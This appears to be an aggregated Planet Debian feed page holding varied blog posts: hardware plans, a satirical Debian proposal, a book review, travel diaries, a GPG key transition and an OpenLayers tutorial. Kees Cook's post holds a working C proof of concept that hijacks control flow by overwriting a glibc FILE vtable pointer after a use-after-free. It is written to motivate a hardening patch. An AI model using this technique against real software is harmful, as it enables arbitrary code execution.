Das Ger t verf gt ber bis zu 6 SATA Anschl sse. Davon werden vier standardm ig via Wechselrahmen belegt. Die mitgelieferte 250GB Festplatte wird vorerst das Betriebssystem aufnehmen und an den drei verbleibenden Anschl ssen werden zun chst drei WD Red WD20EFRX 2TB (5400 RPM) Festplatten als RAID-5-Verbund f r den notwendigen Platz sorgen. Letzterer l sst sich ohne Erweiterung nur via Software-Raid und mdadm realisieren.
Betriebssystem wird Debian GNU/Linux. Der Hauptspeicher wird auf mindestens 8GB ECC-Ram aufger stet.
Der Microserver l sst sich nicht als Massenspeicher an einen Fernseher anschlie en. Daher soll vorr. XBMC in Verbindung mit einem USB3.0 BR/DVD-Player den Server zum Entertainment-Ger t erheben.
Das ganze soll m glichst wenig Strom verbrauchen und leise sein. Zum Anschluss an das lokale Netzwerk habe ich mich f r WLAN entschieden, da kein Gigabit-Ethernet vorhanden ist. Folgende Teile ben tige ich f r "meinen" Server:
HP ProLiant N54L MicroServer mit Turion II Neo 2,2 GHz, 2GB RAM/250GB HDD - ca. 200 EUR (lokal)
Bel ftung / Lautst rke
Scythe Slip Stream Geh usel fter 120mm 800RPM 11dB - ca. 9 EUR (SY1225SL12L)
Scythe Slip Stream Geh usel fter 120mm 500RPM 7,5dB - ca. 8 EUR (SY1225SL12SL)
TP-Link TL-WN722N(C) 150Mbps USB-Adapter - ca. 15 EUR (TL-WN722N(C))
3x WD Red WD20EFRX 2TB 5400 RPM SATA600 f r NAS 24/7 - ca. 95 EUR / St. (WD20EFRX)
8GB (2x4GB) Kingston ValueRAM DDR3-1333 CL9 ECC Modul RAM-Kit - ca. 85 EUR (KVR1333D3E9SK2/8G)
16GB (2x8GB) Kingston ValueRAM DDR3-1333 CL9 ECC Modul RAM-Kit - ca. 145 EUR (KVR1333D3E9SK2/16G)
Sapphire Radeon HD 5450/6450/6570/6670/7750 PCIe 16x Low-Profile passiv/aktiv - ca. 25..100 EUR (11166-45-20G, 11190-09-20G, 11191-27-20G, 11191-02-20G, 11192-18-20G, 11202-10-20G)
SILVERSTONE PCIe 1x USB3.0 2xInt 2xExt - ca. 21 EUR (SST-EC04-P)
Logitech K400 od. Keysonic ACK-540RF - ca. 40 EUR (920-003100 bzw. ACK-540 RF)
BR/DVD-Player od. Brenner mit USB3.0 Anschluss - 50..100 EUR
LDC Display Modul mind. 4x20 - ca. 10 EUR
Interessant ist auch noch die Option einer echten RAID-Karte. Ich stie dabei auf die IBM ServeRAID M1015 (46M0831) und diesen Hinweis. Kauft man stattdessen den "Schl ssel" zur Freischaltung des vollen Funktionsumfanges, dann bezahlt man (lokal) zus tzlich ca. 150 EUR! Aber das nur BTW. N tzliche Links:

31 March 2013

Enrico Zini: A proposal to solve gender imbalance in Debian

A proposal to solve gender imbalance in Debian We've done all we can so far: Debian Women, the Diversity Statement, the anti-harassment contact, gender neutral language, lots of education all round, but we still suffer from a strong gender imbalance in Debian. I think that the reason is that the majority group of cisgender men in the project, although they don't actively work /against/ the rest, still have /no incentive/ to be inclusive, and generally do not understand what bearing a female name online is like. I think it is about time we addressed that, and after a lot of thinking and discussing with many other concerned debianers, I think I have just the right proposal, which is twofold. The first part is this: since the goal is to have an equal gender perception in Debian, we can just decide to only approve one obviously-male-named DD for every obviously-female-named one. That's right: no new obviously-male-named DD unless an obviously-female-named DD has just been approved. It may sound like affirmative action gone wild, but please stop a moment to think about it: this would create precisely the right incentive for the currently dominant group of developers to be inclusive! People shouldn't just assume they can get a Debian account regardless of what happens around them. We already ask NM candidates to fix RC bugs and, well, gender imbalance should be treated as an RC bug, and everyone should feel compelled to join the effort to fix it! Now, of course since there currently are many male names in NM but not a single female name, it would not be reasonable to just stop the flow of new developers into the project: that would just have the effect to make us starve on personpower. So here is the second part of the proposal: the one-female-name-one-male-name policy will not be enforced for, say, a year. But during this year, everyone currently in NM or joining NM will be asked to adopt a female identity. Crazy? No, genius! It's about time people understood what it means to get advances in private every time they make a public contribution! What better way than just trying it out for themselves? On top of that, as more and more female names appear in Debian changelogs, fake or not, people will finally start to understand that it does not matter what name is used to sign the contribution, but the contribution itself. I don't know if this will give us a community where people realise female or male contributions are equally valuable, which is what I hope, or a community where people will think that everyone is a cisgender man even if they have female names. In the end, really, it does not matter. Either way, we finally get to have a community where everyone is /guaranteed/ to be treated the same. But gender imbalance isn't the only imbalance we have in Debian. People accrue a reputation over time, good or bad, and this reputation tends to stick on you for years, regardless of how you may change, for better or for worse. When we evaluate the merit a contribution, we should not be biased by the reputation of the contributor! How can new contributors be taken seriously otherwise? I believe we are loosing lots of fresh, good ideas this way. And how much damage could be wrecked on the project by a well-respected contributor, like a Debian Account Manager, who is having a funny day? I think we can address this just as I propose to address gender imbalance: let's swap identities from time to time, like it usually happens with nametags at the end of Debconfs. Let's see gregoa upload a patched versions of python3.2, and enrico upload a new upstream version of eglibc! See if we won't finally have some peer review at last! Reputation and real identities have many merits, but we have come to rely too much on them, and it is hurting us. It is time we did something about it, before it is too late!

12 March 2013

Russ Allbery: Review: Commitment Hour

Review: Commitment Hour, by James Alan Gardner
Series: League of Peoples #2
Publisher: Eos
Copyright: April 1998
ISBN: 0-380-79827-1
Format: Mass market
Pages: 343
This is the second book in Gardner's League of Peoples universe, following Expendable, but it is largely unrelated to that novel apart from taking place in the same universe. Expendable follows the portion of humanity that has left Earth and embraced the universe and the advanced technology of the League. Committment Hour is set on Earth, in one of the remaining low-tech settlements that have become a backwater of humanity. Earth is governed by the Spark Lords, who appear to be a sort of scientific artistocracy empowered by the League of Peoples (Gardner gets into this more in later books in the series), but the community in this book is largely left alone. The protagonist of Committment Hour is Fullin, a resident of Tober Cove. The Tober Cove community has a very unusual interaction with gender. Every year, all inhabitants under the age of twenty (starting at the age of two) are taken away by what are viewed locally as gods. When they return, they have the opposite gender. They live their childhoods alternating gender every year, including a mandatory pregnancy (created on one of those trips by the gods) and childbirth. Then, at the age of twenty, rather than being gender-swapped like the other children, they choose the gender that they'll live with for the rest of their life. Fullin is (at least at the start of this book) currently male, but as the book opens on the eve of the day of his final gender committment, he's still undecided on what gender he'll choose. A review of this sort of book immediately requires a significant caveat: this story is all about social constructions of gender and about the implications of one specific transgender scenario. As a cisgender man who fits comfortably within society's normal gender construction, I'm not going to do the best job of judging how well it deals with those issues. It was on the long list for the Tiptree Award, which is a fairly good sign that it does okay, and a quick Internet search didn't uncover any significant dislike, but it's quite possible that I would miss places where it fell short. That said, I found Gardner's presentation of gender fascinating, in large part because Committment Hour is told from deeply inside Fullin's perspective and Gardner treats the Tober Cove gender swapping mostly as the unremarked normal. Fullin and the other inhabitants are quite aware that gender doesn't work for them the way that it does for everyone else, but they consider their gender process entirely sensible and can't imagine how weird life would be without the chance to experience both genders and to have carried a child. And Gardner has several aces up his sleeve that let him, by the end of the book, position Tobin Cove's experience as a very specific and local experience that would not necessarily generalize to gender in society at large, which I thought was an ingenious way to avoid overreaching and excessive generalization. This is not a gender utopia; Fullin's world is rather patriarchal and strongly gender essentialist. The village was, in the past, ruled by a sort of religious fantatic who laid down very firm rules about the roles of men and women, and the village largely stuck to them, but since anyone can choose which gender they want to become, the gender essentialism is also undermined in an interesting way. It becomes more akin to a choice of careers rather than an innate quality, albeit with only two choices and with a permanent decision at the age of 20. Gardner complicates the situation further by introducing a neuter gender (at least that's what the characters call it; by physical description, hermaphrodite would be a more accurate description). People actually have three choices on their twentieth birthday, and although the Patriarch who ruled Tober Cove outlawed and banished all "neuts," it's still a choice. Near the start of Committment Hour one of those who chose the "neut" gender returns to Tober Cove in the company of a Spark Lord (thus making "it" the pronoun used by the natives untouchable and somewhat immune to the normal local prejudice). Committment Hour follows Fullin and his close friend and possible future wife or husband through their last day before their committment hour, a day complicated by the incessant curiosity of the observing Spark Lord and his companion. Gardner has some rather neat world building and some revelations in store; this is the sort of book where, by the end, the curtain has been fully pulled back and the audience gets to peer into the machinery. But most of the book is about the social and societal structure of Tober Cove, about how it feels to swap back and forth between genders (and how specific that is to Tober Cove's unique situation), and how this complicates interpersonal interactions. It's an immersive sort of book that puts the reader in Fullin's head and shows his (and her) comfort with the Tober Cove culture and discomfort with the life choices that he faces as part of committment. As with everything by him I've read, Gardner's tone in writing is unique and can take a bit of getting used to. His stories tend to have a light, almost flippant attitude with frequent touches of absurdist humor, which can give the erroneous impression that he isn't taking his story seriously. But there is depth beneath that tone. Fullin may treat some questions flippantly, but he gives them serious thought and works through the consequences. And I was delighted by how Fullin completely scuttled the Spark Lord's arrogant assumption of superiority around his scientific understanding of things Fullin treats as mythological. Committment Hour is different fare than the typical SF novel, with a lot of focus on an unusual domesticity and small village politics. The technology and the world building are mostly saved for the climax, although are quite satisfying when they finally come. It's primarily a thought-provoking treatment of gender that avoids overreaching by grounding the story in a specific situation. I found it a bit slow in places, and occasionally wanted the characters to stop being stupid and stop dithering, but I ended up enjoying it rather more than I expected. Mildly recommended. Rating: 7 out of 10

30 January 2013

Roland Mas: Various small bits

Dear reader, I know you're wondering what I'm getting up to these days. Or at least, I guess there's a possibility that you're wondering. So since there's no single bit of news that would be worthy of a post here by itself, here's one summarizing things, in the hope that the accumulation makes a tiny bit of a difference. On the rock'n'roll front: Eleven did its first true gig on our own in a pub last Saturday. And when I say on our own , it could almost be taken literally, for we must have had a grand total of about 10 people. A bit of a disappointment, to say the least, especially since the pub was about 120 kilometers from home, 60 of which I rode on my motorbike at 2 AM (and close to 0 C). However, the landlord seemed to like us and hinted at further gigs during seasons where people are more likely to go out for drinks and music than to stay warm at home. In a related note: we got ourselves a small set of stage lights (LED-powered, of course), and they have, in addition to the power cord and various switches, two sockets at the back for plugging XLR-3 cables. On investigation, it seems that this means they can be controlled by a protocol known as DMX 512, which opens up a lot of possibilities for someone who likes to control various things from a computer. I read a few web pages to get an idea of how this is supposed to work, it seems rather simple and straightforward, but the required software isn't in Debian yet. So I guess that if/when I get the necessary hardware, I'll have a new hobby and new toys to play with. Maybe our next gig will have bursts of lights on the big accented beats, triggered by strong enough hits on my drum cymbals. This allows me to link to a new minor release of Wiimidi. The only addition is a new configuration section mapping to the default drumkit provided by Hydrogen. And finally, to stay in the small bits of software , I was prompted to give my simple GPG-encrypted password store, a.k.a. SGEPS, its own page, with a proper release and so on. So there, 0.1 is out, with minimal Debian packaging included.

19 January 2013

Dirk Eddelbuettel: Sing The Truth at Symphony Center

Just back in from an amazing concert at the Chicago Symphony Center. Vocalists Angelique Kidjo, Dianne Reeves and Lizz Wright supported by all-star band of Geri Allen on piano, Romero Lubambo on electric and acoustic guitar, James Genus on electric bass guitar, Munyungo Jackson on percussion and Terri Lyne Carrington on drums (and musical director). The concert alternates between solos and joint pieces with more joy and soul than I heard in a long time. Great evening.

15 December 2012

Thorsten Glaser: Der heilige Frieden?

(Apologies for putting this on Planet Debian, but it says the one or other non-English post is okay as long as it s an exception. I feel I need to reach more people with this, but don t feel like translating this into English right now.)
Update: Tanguy asked for a short English summary: it s me ranting against the rioting against muslims and the call for more CCTV surveillance after a possible bomb was found at the train station. In Bonn herrscht immer noch Bombenstimmung , wenn man z.B. auf die Webseite der Lokalzeitung schaut von dem Amoklauf in Connecticut, ber den sich im IRC gewunder wird, ist immer noch nichts zu sehen, daf r wird flei ig wider Islamisten gehetzt. Ich finde das besorgniserregend, mu doch jetzt jeder Angeh rige des Islams f rchten, verfolgt oder benachteiligt zu werden. Das reizt doch erst recht zum Gegenschlag, bei dem dann auch Menschen, die absolut nicht mit der hier vorherrschenden Meinung und Politik bereinstimmen, getroffen werden k nnen. Ich pers nlich habe kein Problem mit Menschen anderen Glaubens oder anderer Weltanschauung, solange wir friedlich miteinander leben k nnen. Ich teile eure Unzufriedenheit mit dem herrschenden Staat, der immer weitergehenden berwachung, Unterdr ckung von Leuten, die nicht dem vorherrschenden Menschenbild entsprechen (egal an welchen Kategori n), und bitte die, die dies lesen, nochmal nachzudenken, bevor sie etwas tun, was hinterher Unschuldige trifft oder gar in friendly fire ausartet. Hat eigentlich wer die in Bad Godesberg ausgegebenen Koran-B cher sich mal angeschaut? Als ich davon las, war ich ja zugegebenerma en neugierig, weil ich vom Koran leider eher wenig kenne, wei aber nicht, wie neutral oder eben nicht die bersetzung gehalten ist. Anhand dessen, was ich bereits mitbekam, sollte das eher friedlicher sein als was durch sp tere Theologen festgelegt wurde wie ja auch zum Beispiel im Christentum, aber ber die Horrorepisoden der christlichen Kirche will ich jetzt auch nicht mich auslassen, in der Hoffnung, da auch diese sich mit den Jahren gebessert hat. (Ist nur halt das Problem mit den Leuten, die die alten Hetzparolen jetzt noch verbreiten. Ist wie im Netz mit den Groupies von Theo de Raadt, die noch asiger zu Leuten sind als er selber.) (Au erdem mu man ja bef rchten, durch Besitz eines Korans schon vorverurteilt zu werden heutzutage *seufz* ich finde das nicht gut!) Update (ich verga ): auch der Ruf nach mehr Video berwachung ist nur Panikmache. Das geht nur zu Lasten des Normalb rgers. Vielleicht lassen sich noch Kleinstdelikte wie Taschendiebstahl damit abschrecken, aber gerade diese Bomben und dergleichen sind doch oft von Leuten, die vor Konsequenzen keine Angst haben, organisiert. Die werden dann maximal M rtyrer. Ich wiederhole nochmal f r die Politiker und die ganz langsamen unter den Lesern: berwachung verhindert keine Straftat.

16 June 2012

Vincent Bernat: GPG Key Transition Statement 2012

I am transitioning my GPG key from an old 1024-bit DSA key to a new 4096-bit RSA key. The old key will continue to be valid for some time but I prefer all new correspondance to be encrypted with the new key. I will be making all signatures going forward with the new key. I have followed the excellent tutorial from Daniel Kahn Gillmor which also explains why this migration is needed. The only step that I did not execute is issuing a new certification for keys I have signed in the past. I did not find any search engine to tell me which key I have signed. Here is the signed transition statement (I have stolen it from Zack):
Hash: SHA256,SHA1
I am transitioning GPG keys from an old 1024-bit DSA key to a new
4096-bit RSA key.  The old key will continue to be valid for some
time, but I prefer all new correspondance to be encrypted in the new
key, and will be making all signatures going forward with the new key.
This transition document is signed with both keys to validate the
If you have signed my old key, I would appreciate signatures on my new
key as well, provided that your signing policy permits that without
reauthenticating me.
The old key, which I am transitional away from, is:
  pub   1024D/F22A794E 2001-03-23
      Key fingerprint = 5854 AF2B 65B2 0E96 2161  E32B 285B D7A1 F22A 794E
The new key, to which I am transitioning, is:
  pub   4096R/353525F9 2012-06-16 [expires: 2014-06-16]
      Key fingerprint = AEF2 3487 66F3 71C6 89A7  3600 95A4 2FE8 3535 25F9
To fetch the full new key from a public key server using GnuPG, run:
  gpg --keyserver --recv-key 95A42FE8353525F9
If you have already validated my old key, you can then validate that
the new key is signed by my old key:
  gpg --check-sigs 95A42FE8353525F9
If you then want to sign my new key, a simple and safe way to do that
is by using caff (shipped in Debian as part of the "signing-party"
package) as follows:
  caff 95A42FE8353525F9
Please contact me via e-mail at <> if you have any
questions about this document or this transition.
  Vincent Bernat
Version: GnuPG v1.4.12 (GNU/Linux)
For easier access, I have also published it in text format. You can check it with:
$ gpg --keyserver --recv-key 95A42FE8353525F9
gpg: requesting key 353525F9 from hkp server
gpg: key 353525F9: "Vincent Bernat <>" not changed
gpg: Total number processed: 1
gpg:              unchanged: 1
$ curl   \
>       gpg --verify
To avoid signing/encrypting with the old key who share the same email addresses than the new one, I have saved it, removed it from the keyring and added it again. The new key is now first in both the secret and the public keyrings and will be used whenever the appropriate email address is requested.
$ gpg --export-secret-keys F22A794E > ~/tmp/secret
$ gpg --export F22A794E > ~/tmp/public
$ gpg --delete-secret-key F22A794
sec  1024D/F22A794E 2001-03-23 Vincent Bernat <>
Delete this key from the keyring? (y/N) y
This is a secret key! - really delete? (y/N) y
$ gpg --delete-key F22A794E
pub  1024D/F22A794E 2001-03-23 Vincent Bernat <>
Delete this key from the keyring? (y/N) y
$ gpg --import ~/tmp/public
gpg: key F22A794E: public key "Vincent Bernat <>" imported
gpg: Total number processed: 1
gpg:               imported: 1
gpg: 3 marginal(s) needed, 1 complete(s) needed, classic trust model
gpg: depth: 0  valid:   2  signed:   0  trust: 0-, 0q, 0n, 0m, 0f, 2u
gpg: next trustdb check due at 2014-06-16
$ gpg --import ~/tmp/secret
gpg: key F22A794E: secret key imported
gpg: key F22A794E: "Vincent Bernat <>" not changed
gpg: Total number processed: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
$ rm ~/tmp/public ~/tmp/secret
$ gpg --edit-key F22A794E
gpg> trust
Please decide how far you trust this user to correctly verify other users' keys
(by looking at passports, checking fingerprints from different sources, etc.)
  1 = I don't know or won't say
  2 = I do NOT trust
  3 = I trust marginally
  4 = I trust fully
  5 = I trust ultimately
  m = back to the main menu
Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y
I now need to gather some signatures for the new key. If this is appropriate for you, please sign the new key if you signed the old one.

19 May 2012

Richard Hartmann: Mongolia

I will start linking to places we stayed at etc, from now on. On the one hand, we already left those places so my paranoid self can rest assured that no one will come hunt us down, on the other hand, I decided to only to name and link to those places which really deserve a mention. If they are linked here, I can whole-heartedly recommend them. Mongolia After leaving through the Russian border fortifications, Mongolia was an instant and welcome change. Trees growing right next to the tracks, branches forming a bit of a natural tunnel; the trains passing by keeping branches at bay, but the trees free to grow wherever else they pleased. A few hundred meters later below a rocky ledge, a cow had apparently fallen down and died. Partially decomposed flesh still clinging halfway to its rib-cage, it proved to be a sign of the (mostly) more laid-back attitude Mongolians tend to take. After finally getting our passports back and being allowed to leave the train, we first headed to the station to get some money. At ~1800:1, the exchange rate for Tugruk against Euro speaks volumes about inflation; imagine my surprise that the MNT 20,000 note is the largest one. It's also the one and only amount any and all ATMs will default to. We were quite surprised by how cheap everything was, even in the one single store within the station directly behind the border. In Russia, travellers expect to pay hefty markups when shopkeepers know they can charge them, not so in Mongolia. The woman in the trash Upon returning from the station, our waggon was just merrily being driving away on its own by a lone engine, something we had not anticipated or appreciated a whole lot. A woman (we hadn't noticed her before) who was busy scavenging a trash container for food for herself and her scrawny-looking son happily stopped what she was doing and, with a big smile, moved her hands around and smacked them back together, signalling us that our waggon would be attached to a different train for the subsequent journey. To put it mildly, I was stunned; we had met people eating from the trash in Russia as well (yes, I always make a point of giving them enough for a few decent meals; anyone eating out of the trash actually needs and definitely deserves something good happening to them), but they were glum and disheartened. Here, there was someone who not only had to look out for herself, but for a three or four year old boy as well, and still was just so... positive... I don't know if I would have it in me to act the same way... As an aside, even though we were just a few kilometers across the border from Russia, she did not actually take the money from me, she cupped her hands to receive it by having me place it into her hands; this is a very Asian thing in my experience and something we would see both in Mongolia and China consistently. Later, when we were back in our waggon, she passed by and happened to see the Spot Messgenger 2 dangling in front of our window, its lights blinking every five seconds. For a solid twenty minutes, until the train started moving again, she squatted down with her son, oggling the Spot. I have no idea what she was thinking it was and I had no chance to explain it to her, but she was really fascinated and just kept staring and staring. When we finally left the station, we waved to and smiled at each other, she ran after us, and then she was gone. All in all, this was one the more memorable things which happened to us. Mongolian Infrastructure When I say that Mongolians as a whole tend to be a lot more laid back than Russians, this extends to infrastructure as well, but not in the good way. Ulan Bator Little Dhingis Khan We arrived in Ulan Bator at six in the morning and started haggling with taxi drivers. Our hostel had (stale, it turned out) information about acceptable fare from station to their place on their website, 5,000 MNT was supposedly OK. Our driver tried to get 20,000, then 15,000, then 12,000, then 10,000, went down to 7,000 and finally settled for 5,000, all this interspersed with frequent "no" by us and walking away. Once on the road, he wanted to convince me that we had agreed upon 5,000 per person, something that did not quite work out for him. When we arrived, he started to tell me that he was good friends with the hostel manager and that said manager would surely want us to pay more; again, that did not work too well. He made the mistake of getting our luggage out of his trunk immediately (we always kept all our stuff in the passenger area afterwards...) before I paid and even though I only had a 10,000 or 20,000 note, I insisted on correct change. The same old dance began anew, with him edging closer to the correct change in steps of 1,000 MNT. He tried to get away several times, but I stood in his door and held it open; if he had just driven off, I couldn't have stopped him, but that thankfully didn't occur to him. After he shoved all small change (MNT is bill only, no coins) he had with him at me and wanted to make off yet again, I was close to throwing all the small crap at him, but after he, a man of maybe 1.65 meter and sitting down, tried to signal his willingness for a fist fight and me, a man of 1.94 meter and standing started laughing, he gave me 2,000 more and drove off cursing. In case you forgot, at that exchange rate, we argued about two to three Euro, but as he tried to cheat, it became a matter of principle. The Hostel, part one All parking lots and other property in Ulan Bator have a small watchtower with private 24/7 guards; said guard ambled down, let us in and woke the poor woman who was forced to let us check in. As she was Mongolian as well, we were a bit surprised when she switched from broken English to perfect German, but the owners of the OASIS are a German-Austrian couple so I guess that makes sense. Fighting through the war Traffic in Ulan Bator is war. Lonely Planet talks about the city being too newly motorized and that it did not have to develop a culture of driving, yet. This is a euphemism for "no one has any qualms maiming or killing you". Everyone is driving like mad, nudging and racing their way in front of each other. If a driver has an oppurtunity to get ahead by a few centimeters with his small car, thereby blocking the way for several buses, making a whole parking lot grind to a halt and thereby deadlocking themselves, they will take said opportunity, and gladly. Red lights are gentle suggestions, there to be mainly ignored; police will not drive over red lights, but they will not stop anybody else from doing so, either. A hearse will have a dozen or more cars following it, all driving in a tight pack, aggressively attacking anyone who dares to wedge in between them and expecting all other traffic to make way even if they are driving over a red light. Crossing a main street in Ulan Bator as a pedestrian is hell. There are a few traffic lights and they help to some extent, but you still need to be extremely careful when crossing a street. Thailand, India, Russia, China, no matter where it's supposedly hard to cross a street by foot, I never had any issues weaseling through. In UB, it takes planning, determination, and a lot of attention, especially as there are stretches where there's not a traffic light in sight. While maintaining eye contact with a driver usually ensures that they will try not to hit you, this does not work in the least in UB. In the evening, I took to shining a high-powered flashlight at the ground to the oncoming traffic's side to mark ourselves and decrease the likelihood of being hit. This worked well in combination with sprinting through gaps in the traffic, except for one guy who actively aimed for us and did not slow down. He even changed lanes, just to keep us in front of his car... Shining the flashlight directly at him in highest mode made him break quite violently though; a good thing, as he may have hit us had he not slowed down. UB itself Ulan Bator is weird. It has clear signs of westernization, but it's still very much an old city. There is one large store which would fit into any random shopping center in Germany (which are tiny when compared to most other countries) and which carries most goods, if with a limited selection. Its supermarket is extremely well stocked with food and drink from all other the world and laughably cheap (for us) prices. While its infrastructure is definitely crumbling, the city is clean, especially when compared to Russia. Two girls from Stuttgart who we met during our Trans-Siberian travels commented on how clean Russian cities were when compared to home, but that may be more of a statement about Stuttgart than about Russia... Anyway, in Mongolia in general and in UB in particular, there's a concise effort to make what they have look nice and clean. There is no trash in the streets, loose gravel and earth is removed from the curb by dedicated workers, all areas of packed earth are sieved and all large stones removed. All in all, it's a lot cleaner (if more dusty and sandy) than Russian cities if somewhat older and more shabby-looking. That being said, Mongolia's countryside is littered There were several street stalls consisting of nothing more than a cardboard box on a stool selling single chewing gums and cigarettes from the original packaging; it's normal for people to buy one cigarette or one piece of chewing gum and walk on. The sights of UB were nice, but nothing too special. Outlook In the next part, I'll cover "The Hostel, part disaster" and generally talk more about excrement than I thought one could write before moving on to China (were I am located at the time of this writing).

23 December 2011

Kees Cook: abusing the FILE structure

When attacking a process, one interesting target on the heap is the FILE structure used with stream functions (fopen(), fread(), fclose(), etc) in glibc. Most of the FILE structure (struct _IO_FILE internally) is pointers to the various memory buffers used for the stream, flags, etc. What s interesting is that this isn t actually the entire structure. When a new FILE structure is allocated and its pointer returned from fopen(), glibc has actually allocated an internal structure called struct _IO_FILE_plus, which contains struct _IO_FILE and a pointer to struct _IO_jump_t, which in turn contains a list of pointers for all the functions attached to the FILE. This is its vtable, which, just like C++ vtables, is used whenever any stream function is called with the FILE. So on the heap, we have: glibc FILE vtable location In the face of use-after-free, heap overflows, or arbitrary memory write vulnerabilities, this vtable pointer is an interesting target, and, much like the pointers found in setjmp()/longjmp(), atexit(), etc, could be used to gain control of execution flow in a program. Some time ago, glibc introduced PTR_MANGLE/PTR_DEMANGLE to protect these latter functions, but until now hasn t protected the FILE structure in the same way. I m hoping to change this, and have introduced a patch to use PTR_MANGLE on the vtable pointer. Hopefully I haven t overlooked something, since I d really like to see this get in. FILE structure usage is a fair bit more common than setjmp() and atexit() usage. :) Here s a quick exploit demonstration in a trivial use-after-free scenario:
#include <stdio.h>
#include <stdlib.h>
void pwn(void)
    printf("Dave, my mind is going.\n");
void * funcs[] =  
    NULL, // "extra word"
    NULL, // DUMMY
    exit, // finish
    NULL, // overflow
    NULL, // underflow
    NULL, // uflow
    NULL, // pbackfail
    NULL, // xsputn
    NULL, // xsgetn
    NULL, // seekoff
    NULL, // seekpos
    NULL, // setbuf
    NULL, // sync
    NULL, // doallocate
    NULL, // read
    NULL, // write
    NULL, // seek
    pwn,  // close
    NULL, // stat
    NULL, // showmanyc
    NULL, // imbue
int main(int argc, char * argv[])
    FILE *fp;
    unsigned char *str;
    printf("sizeof(FILE): 0x%x\n", sizeof(FILE));
    /* Allocate and free enough for a FILE plus a pointer. */
    str = malloc(sizeof(FILE) + sizeof(void *));
    printf("freeing %p\n", str);
    /* Open a file, observe it ended up at previous location. */
    if (!(fp = fopen("/dev/null", "r")))  
        return 1;
    printf("FILE got %p\n", fp);
    printf("_IO_jump_t @ %p is 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));
    /* Overwrite vtable pointer. */
    *(unsigned long*)(str + sizeof(FILE)) = (unsigned long)funcs;
    printf("_IO_jump_t @ %p now 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));
    /* Trigger call to pwn(). */
    return 0;
Before the patch:
$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0xf7796aa0
_IO_jump_t @ 0x984609c now 0x0804a060
Dave, my mind is going.
After the patch:
$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0x3a4125f8
_IO_jump_t @ 0x984609c now 0x0804a060
Segmentation fault
Astute readers will note that this demonstration takes advantage of another characteristic of glibc, which is that its malloc system is unrandomized, allowing an attacker to be able to determine where various structures will end up in the heap relative to each other. I d like to see this fixed too, but it ll require more time to study. :)

2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

28 October 2011

Kai Wasserb ch: Google recommends using OpenStreetMaps/OpenLayers

Maybe you've already heard, that Google is starting to charge a fee for using the Maps API (Google may decide you're an non-profit organization and waive the fees). That is, in my opinion, Google telling you to look for better alternatives. And thanks to the awesome effort of the OpenStreetMaps community, there is such an alternative. Thus today's addition to the mini-tips series will tell you, how you get an OpenStreetMaps-powered map on your website.
  1. First you need to determine the coordinates, where you want to center, the map. You can do this with Just search for the address, right-click on the marker highlighting the result, and set it as e.g. your start point, that'll give you the coordinates in the start field on the left. Alternatively you can just move your pointer over a place on the map and have a look at the lower right corner, where the current coordinates for the pointer position are displayed.
  2. Then you need to add a few things to the website, where the card is to be shown:
    • Include the OpenLayers script in the <head> of your webpage:
      <script src="" type="text/javascript" />
    • Add a short ECMAScript snippet right after that, which will initialize your map:
      function osmInit()  
        document.getElementById("ol_map").style.display = 'block';
        var lonLat = new OpenLayers.LonLat(13.376096, 52.518598) // Center of the map
          new OpenLayers.Projection("EPSG:4326"),   // transform from WGS 1984
          new OpenLayers.Projection("EPSG:900913")  // to Spherical Mercator Projection
        var map = new OpenLayers.Map("ol_map");
        var osmlayer = new OpenLayers.Layer.OSM();
          16 // Zoom level
      The first line is not needed, but I find it nice to hide the map on default, in case the user has disabled ECMAScript they haven't a large empty area somewhere on the website. The first line changes then the display value from "none" to "block". The rest is, I hope, already explained by the code itself.
    • Now only two more changes are needed, first you need to add onload="osmInit();" to your <body> tag. And afterwards an element (say a <p>) with the ID ol_map somewhere in the website <body>. You should set a width and height for that tag (style is your friend), otherwise the map might be bigger than you like.
  3. Done. Enjoy your free (not just as in free beer) map!
You can, of course, customize your map further by adding additional layers and changing the available options (e.g. the zoom level). If you would want to mark a location on your map, you'd need to add something like
var markers = new OpenLayers.Layer.Markers("POI1");
markers.addMarker(new OpenLayers.Marker(lonLat));
to your ECMAScript snipped after you added the OpenStreetMaps layer. These three lines would mark the location given by the variable lonLat. For further information, you can check out the OpenStreetMaps wiki and the OpenLayers documentation. In case you wonder, where my coordinates from this example point, you can check. Oh, and don't forget to consider a donation to OpenStreetMaps, so the project can pay the bills for its servers.

12 September 2011

John Goerzen: Mexico Part 2: Lodging & Family

As I wrote in part 1, my family and I were in Mexico recently. Today I ll write about the places we stayed. We spent most of the time in a room we rented in a private home in Guadalajara. My friend Jonathan had found it for us, and it was not too far from his home. The owner was a grandmother, and across the courtyard was more family, including a granddaughter close in age to our boys. They enjoyed playing together. It was really a perfect arrangement for us. There s no better way to be a part of local life when traveling than to stay in someone s house. Here s our bedroom: Notice the glass slats in the window it s a nifty, though not airtight, alternative to our regular windows. More on that later. More of the inside: We had a bit of a language barrier while in Mexico, though never anything significant. My Spanish vocabulary started with almost nothing and I reached maybe a few dozen words by the time we left. Terah knew some Spanish from high school and college, and my friend was fluent. Our hostess also knew a little English. But we all communicated well enough. Terah or Jonathan would help translate when needed. As I d seen before, the children would say things to each other, but never seemed to be bothered that their playmates didn t understand what was being said. They just had a great time anyhow. On Sunday afternoon, when we came back from our activities, there was a buzz of activity. Children everywhere outside, running and playing. Adults too, chatting. We didn t know exactly what was happening, but sent Jacob and Oliver out to play anyhow (which they were eager to do). The yard was enclosed by a wall, so children could pretty much run around without lots of supervision. Eventually they were invited to have some birthday cake (ah ha!) it was one of the children s birthday. Jacob and Oliver actually were served the first two pieces of cake (as the amigos ). Everyone seemed so friendly, warm, and welcoming. Each morning started with breakfast at the house, followed by a scene like this: That s Jacob and Oliver, looking to see if Jonathan had arrived for the day yet. I often noticed in Mexico that I was unsure if I was inside or outside. Here in Kansas, we can have a string of summer days that each exceed 110F (44C) or a few weeks in winter that never get above 15F (-9C), even in daytime. And then we have some pleasant days like right now, too or rain blowing sideways at 60MPH. In general, we spend a lot of effort keeping the outside, well, out. It is quite clear that this isn t a problem in the 